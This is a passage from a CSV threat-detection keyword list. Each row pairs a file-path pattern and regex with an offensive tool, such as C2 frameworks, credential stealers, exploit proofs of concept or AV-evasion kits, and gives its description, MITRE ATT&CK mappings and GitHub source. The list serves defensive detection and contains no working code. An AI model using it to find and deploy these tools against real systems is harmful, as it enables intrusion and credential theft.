T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/exec0.py*",".{0,1000}\/exec0\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/Executable_Files.git*",".{0,1000}\/Executable_Files\.git.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/execute_shellcode.exe*",".{0,1000}\/execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/execute-api.eu-central-1.amazonaws.com/catspin_deployed*",".{0,1000}\/execute\-api\.eu\-central\-1\.amazonaws\.com\/catspin_deployed.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*/execve_hijack*",".{0,1000}\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/exegol.py*",".{0,1000}\/exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/exegol_user_sources.list*",".{0,1000}\/exegol_user_sources\.list.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/exegol-docker-build/*",".{0,1000}\/exegol\-docker\-build\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Exegol-history/*",".{0,1000}\/Exegol\-history\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Exegol-images-*.zip*",".{0,1000}\/Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Exegol-images.git*",".{0,1000}\/Exegol\-images\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ExeStager/*",".{0,1000}\/ExeStager\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/exetotext.ps1*",".{0,1000}\/exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/exfilGui.ps1*",".{0,1000}\/exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/exfiltrate.exe*",".{0,1000}\/exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/exocet.elf*",".{0,1000}\/exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*/exocet.exe*",".{0,1000}\/exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*/EXOCET-AV-Evasion.git*",".{0,1000}\/EXOCET\-AV\-Evasion\.git.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*/expl/expl.go*",".{0,1000}\/expl\/expl\.go.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","4","307","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" "*/exploit.cron.sh*",".{0,1000}\/exploit\.cron\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/exploit.dll*",".{0,1000}\/exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit.ldpreload.sh*",".{0,1000}\/exploit\.ldpreload\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/exploit.pbj*",".{0,1000}\/exploit\.pbj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit/linux/*",".{0,1000}\/exploit\/linux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit/remote/*",".{0,1000}\/exploit\/remote\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit/windows/*",".{0,1000}\/exploit\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit_orw.py*",".{0,1000}\/exploit_orw\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/exploits/*.go*",".{0,1000}\/exploits\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/exported_credentials.csv*",".{0,1000}\/exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*/exports_function_hid.txt*",".{0,1000}\/exports_function_hid\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*/extensions/kiwi/kiwi.rb*",".{0,1000}\/extensions\/kiwi\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ExtensionSpoof.exe*",".{0,1000}\/ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*/ExtensionSpoofer.git*",".{0,1000}\/ExtensionSpoofer\.git.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/extract_wifi.exe*",".{0,1000}\/extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/ExtractBitlockerKeys.git*",".{0,1000}\/ExtractBitlockerKeys\.git.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*/f5_bigip_tmui_rce.rb*",".{0,1000}\/f5_bigip_tmui_rce\.rb.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*/Fa1c0n35/zabbix-cve-2022-23131*",".{0,1000}\/Fa1c0n35\/zabbix\-cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*/fake.html",".{0,1000}\/fake\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/FakeCmdLine*",".{0,1000}\/FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/fakelogonscreen*",".{0,1000}\/fakelogonscreen.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*/fake-sms.git*",".{0,1000}\/fake\-sms\.git.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*/Farmer.git*",".{0,1000}\/Farmer\.git.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*/fastfuz-chrome-ext*",".{0,1000}\/fastfuz\-chrome\-ext.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","25","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z" "*/FastPathMITM.py*",".{0,1000}\/FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/fb_firstlast.7z*",".{0,1000}\/fb_firstlast\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/fb-brute.pl*",".{0,1000}\/fb\-brute\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*/fcrdns.nse*",".{0,1000}\/fcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/febinrev/dirtypipez-exploit*",".{0,1000}\/febinrev\/dirtypipez\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*/Fentanyl.git*",".{0,1000}\/Fentanyl\.git.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*/fern-wifi-cracker/*",".{0,1000}\/fern\-wifi\-cracker\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Ferrari.ps1*",".{0,1000}\/Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/ffuf.git*",".{0,1000}\/ffuf\.git.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*/ffuf/ffufrc*",".{0,1000}\/ffuf\/ffufrc.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*/fiesta.profile*",".{0,1000}\/fiesta\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 